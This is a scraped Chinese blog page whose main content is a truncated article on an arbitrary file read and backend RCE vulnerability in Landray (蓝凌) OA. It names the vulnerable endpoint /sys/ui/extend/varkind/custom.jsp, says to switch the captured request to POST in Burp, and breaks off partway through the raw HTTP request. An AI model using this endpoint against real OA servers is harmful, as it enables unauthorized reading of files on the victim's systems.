热门标签
热门文章
- 1如何在vue项目中引入scss,并使用scss样式_style lang="scss" 需要npm
- 2linux显示mem进行排序,linux下top命令显示详解
- 3c#和python哪个效率更高,关于C#:Python:为什么*和**比/和sqrt()更快?
- 4Ubuntu 20.04 笔记本无法调节亮度解决方法_ubuntu20.04亮度调节
- 5ATT&CK框架
- 6关于多人操作数据的处理策略_c# 两人同时操作一条数据
- 7unity---用.asset文件作为配置文件_unity .asset文件
- 8Vue项目文件名详解_vue中src目录下的components文件夹
- 9企业数字化转型-数据驱动的核心逻辑_企业数据驱动下的战略形成逻辑主要有
- 10python安装及环境变量配置_python安装步骤以及环境变量配置
当前位置: article > 正文
蓝凌oa任意文件读取,RCE_蓝凌的oa怎么任意文件读取
作者:我家自动化 | 2024-02-16 04:36:26
赞
踩
蓝凌的oa怎么任意文件读取
蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce
漏洞路径:
1.任意文件读取:
/sys/ui/extend/varkind/custom.jsp
漏洞验证:
burp抓包修改数据包
修改为post请求,路径如图
数据包
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.0.101:8080
User-Ag
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家自动化/article/detail/90768
推荐阅读
相关标签
